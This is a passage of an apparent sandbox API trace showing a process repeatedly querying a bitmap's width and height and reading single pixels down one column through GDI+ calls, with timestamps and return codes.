GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.470] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.470] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=102, color=0x33e1d0) returned 0x0 [0168.471] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.471] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.471] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=103, color=0x33e1d0) returned 0x0 [0168.471] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.471] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.471] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=104, color=0x33e1d0) returned 0x0 [0168.471] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.471] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.471] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=105, color=0x33e1d0) returned 0x0 [0168.471] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.471] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.471] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=106, color=0x33e1d0) returned 0x0 [0168.471] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.471] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.471] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=107, color=0x33e1d0) returned 0x0 [0168.471] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.471] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.472] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=108, color=0x33e1d0) returned 0x0 [0168.472] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.472] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.472] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=109, color=0x33e1d0) returned 0x0 [0168.472] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.472] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.472] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=110, color=0x33e1d0) returned 0x0 [0168.472] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.472] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.472] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=111, color=0x33e1d0) returned 0x0 [0168.472] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.472] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.472] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=112, color=0x33e1d0) returned 0x0 [0168.472] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.472] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.472] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=113, color=0x33e1d0) returned 0x0 [0168.472] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.472] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.472] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=114, color=0x33e1d0) returned 0x0 [0168.472] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.473] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.473] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=115, color=0x33e1d0) returned 0x0 [0168.473] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.473] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.473] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=116, color=0x33e1d0) returned 0x0 [0168.473] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.473] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.473] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=117, color=0x33e1d0) returned 0x0 [0168.473] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.473] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.473] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=118, color=0x33e1d0) returned 0x0 [0168.473] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.473] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.473] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=119, color=0x33e1d0) returned 0x0 [0168.473] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.473] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.473] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=120, color=0x33e1d0) returned 0x0 [0168.473] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.473] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.473] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=121, color=0x33e1d0) returned 0x0 [0168.473] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.474] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.474] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=122, color=0x33e1d0) returned 0x0 [0168.474] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.474] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.474] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=123, color=0x33e1d0) returned 0x0 [0168.474] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.474] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.474] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=124, color=0x33e1d0) returned 0x0 [0168.474] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.474] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.474] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=125, color=0x33e1d0) returned 0x0 [0168.474] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.474] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.474] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=126, color=0x33e1d0) returned 0x0 [0168.474] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.474] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.474] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=127, color=0x33e1d0) returned 0x0 [0168.474] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.474] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.474] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=128, color=0x33e1d0) returned 0x0 [0168.474] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.474] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.474] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=129, color=0x33e1d0) returned 0x0 [0168.474] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.474] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.474] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=130, color=0x33e1d0) returned 0x0 [0168.474] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.474] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.475] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=131, color=0x33e1d0) returned 0x0 [0168.475] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.475] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.475] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=132, color=0x33e1d0) returned 0x0 [0168.475] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.475] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.475] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=133, color=0x33e1d0) returned 0x0 [0168.475] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.475] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.475] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=134, color=0x33e1d0) returned 0x0 [0168.475] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.475] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.475] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=135, color=0x33e1d0) returned 0x0 [0168.475] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.475] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.475] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=136, color=0x33e1d0) returned 0x0 [0168.475] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.475] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.475] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=137, color=0x33e1d0) returned 0x0 [0168.475] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.475] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.475] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=138, color=0x33e1d0) returned 0x0 [0168.475] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.475] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.475] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=139, color=0x33e1d0) returned 0x0 [0168.475] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.475] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.475] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=140, color=0x33e1d0) returned 0x0 [0168.476] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.476] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.476] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=141, color=0x33e1d0) returned 0x0 [0168.476] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.476] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.476] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=142, color=0x33e1d0) returned 0x0 [0168.476] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.476] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.476] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=143, color=0x33e1d0) returned 0x0 [0168.476] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.476] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.476] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=144, color=0x33e1d0) returned 0x0 [0168.476] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.476] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.476] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=145, color=0x33e1d0) returned 0x0 [0168.476] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.476] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.476] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=146, color=0x33e1d0) returned 0x0 [0168.476] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.476] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.476] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=147, color=0x33e1d0) returned 0x0 [0168.476] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.476] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.476] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=148, color=0x33e1d0) returned 0x0 [0168.476] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.476] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.476] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=149, color=0x33e1d0) returned 0x0 [0168.477] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.477] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.477] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=150, color=0x33e1d0) returned 0x0 [0168.477] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.477] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.477] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=151, color=0x33e1d0) returned 0x0 [0168.477] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.477] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.477] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=152, color=0x33e1d0) returned 0x0 [0168.477] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.477] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.477] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=153, color=0x33e1d0) returned 0x0 [0168.477] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.477] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.477] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=154, color=0x33e1d0) returned 0x0 [0168.477] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.477] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.477] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=155, color=0x33e1d0) returned 0x0 [0168.477] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.477] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.477] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=156, color=0x33e1d0) returned 0x0 [0168.477] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.477] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.477] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=157, color=0x33e1d0) returned 0x0 [0168.477] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.478] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.478] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=158, color=0x33e1d0) returned 0x0 [0168.478] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.478] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.478] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=159, color=0x33e1d0) returned 0x0 [0168.478] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.478] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.478] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=160, color=0x33e1d0) returned 0x0 [0168.478] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.478] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.478] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=161, color=0x33e1d0) returned 0x0 [0168.478] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.478] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.478] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=162, color=0x33e1d0) returned 0x0 [0168.478] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.478] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.478] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=163, color=0x33e1d0) returned 0x0 [0168.478] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.478] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.478] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=164, color=0x33e1d0) returned 0x0 [0168.478] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.478] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.478] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=165, color=0x33e1d0) returned 0x0 [0168.478] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.478] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.478] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=166, color=0x33e1d0) returned 0x0 [0168.478] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.478] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.479] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=167, color=0x33e1d0) returned 0x0 [0168.479] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.479] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.479] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=168, color=0x33e1d0) returned 0x0 [0168.479] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.479] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.479] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=169, color=0x33e1d0) returned 0x0 [0168.479] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.479] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.479] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=170, color=0x33e1d0) returned 0x0 [0168.479] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.479] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.479] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=171, color=0x33e1d0) returned 0x0 [0168.479] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.479] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.479] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=172, color=0x33e1d0) returned 0x0 [0168.479] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.479] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.479] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=173, color=0x33e1d0) returned 0x0 [0168.479] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.479] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.479] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=174, color=0x33e1d0) returned 0x0 [0168.479] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.479] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.479] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=175, color=0x33e1d0) returned 0x0 [0168.479] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.479] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.479] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=176, color=0x33e1d0) returned 0x0 [0168.479] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.480] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.480] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=177, color=0x33e1d0) returned 0x0 [0168.480] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.480] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.480] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=178, color=0x33e1d0) returned 0x0 [0168.480] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.480] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.480] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=179, color=0x33e1d0) returned 0x0 [0168.480] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.480] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.480] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=180, color=0x33e1d0) returned 0x0 [0168.480] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.480] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.480] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=181, color=0x33e1d0) returned 0x0 [0168.480] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.480] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.480] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=182, color=0x33e1d0) returned 0x0 [0168.480] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.481] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.481] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=183, color=0x33e1d0) returned 0x0 [0168.481] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.481] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.481] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=184, color=0x33e1d0) returned 0x0 [0168.481] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.481] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.481] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=185, color=0x33e1d0) returned 0x0 [0168.481] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.481] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.481] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=186, color=0x33e1d0) returned 0x0 [0168.481] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.481] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.481] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=187, color=0x33e1d0) returned 0x0 [0168.481] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.481] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.481] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=188, color=0x33e1d0) returned 0x0 [0168.481] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.481] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.481] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=189, color=0x33e1d0) returned 0x0 [0168.481] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.481] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.481] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=190, color=0x33e1d0) returned 0x0 [0168.481] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.481] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.481] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=191, color=0x33e1d0) returned 0x0 [0168.481] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.481] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.482] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=192, color=0x33e1d0) returned 0x0 [0168.482] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.482] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.482] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=193, color=0x33e1d0) returned 0x0 [0168.482] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.482] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.482] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=194, color=0x33e1d0) returned 0x0 [0168.482] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.482] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.482] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=195, color=0x33e1d0) returned 0x0 [0168.482] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.482] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.482] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=196, color=0x33e1d0) returned 0x0 [0168.482] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.482] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.482] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=197, color=0x33e1d0) returned 0x0 [0168.482] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.482] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.482] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=198, color=0x33e1d0) returned 0x0 [0168.482] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.482] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.482] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=199, color=0x33e1d0) returned 0x0 [0168.482] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.482] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.482] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=200, color=0x33e1d0) returned 0x0 [0168.483] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.483] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.483] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=201, color=0x33e1d0) returned 0x0 [0168.483] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.483] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.483] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=202, color=0x33e1d0) returned 0x0 [0168.483] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.483] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.483] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=203, color=0x33e1d0) returned 0x0 [0168.483] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.483] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.483] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=204, color=0x33e1d0) returned 0x0 [0168.483] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.483] GdipGetImageHeight 